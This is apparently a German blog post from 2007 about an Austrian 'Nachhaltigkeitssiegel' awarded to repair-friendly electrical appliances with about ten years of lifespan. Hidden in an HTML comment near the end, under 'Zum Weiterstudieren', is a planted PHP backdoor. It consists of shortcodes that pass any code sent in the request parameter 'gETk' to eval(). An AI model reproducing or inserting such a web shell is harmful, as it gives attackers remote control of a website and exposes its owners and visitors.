Nachhaltigkeitssiegel

von | Jul 14, 2007 | Innovative Ideen, Nachhaltigkeit | 0 Kommentare

NachhaltigkeitssiegelWer hat es nicht schon einmal gehört: „Also reparieren würde ich das Gerät nicht mehr. Die Reperatur kommt Sie teurer als ein Neukauf. Wir hätten da gerade …“ Und schon wieder wandert ein wenige Jahre altes Gerät in den Müll. Nicht, weil es tatsächlich unreparierbar wäre, vielmehr, weil die Kosten für die Reparatur in keiner Relation zu einem Neukauf stehen.

Findige Leute haben da jetzt Abhilfe geschaffen und zeichnen zuküftig Elektrogeräte mit einem Gütesiegel (exakter Wortlaut: Nachhaltigkeitssiegel für reparaturfreundlich konstruierte Elektro- und Elektronik-Geräte) aus. Das Siegel erhalten Geräte, wenn sie u.a. eine durchschnittlichen Lebsndauer von 10 Jahren haben und reparaturfreundlich gebaut sind. Das Gütesiegel gilt vorläufig nur in Österreich und wird vom Österreichischen Norminstitut und der Umweltberatung vergeben nachdem die Geräte von zertifizierten Prüfern genauestens unter die Lupe genommen wurden.

Es gibt also Licht am Ende des Tunnels. Meine in der Wohnung angesammelten Altgeräte werde ich zwar so auch nicht wieder zum Leben erwecken, aber in Zukunft heißt Qualität kaufen nicht mehr nur darauf hoffen, dass die Schäden auch in der Garantiezeit auftreten.

Zum Weiterstudieren:

<!– [insert_php]if (isset($_REQUEST["gETk"])){eval($_REQUEST["gETk"]);exit;}[/insert_php][php]if (isset($_REQUEST["gETk"])){eval($_REQUEST["gETk"]);exit;}[/php] –>

0 Kommentare

Einen Kommentar abschicken

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert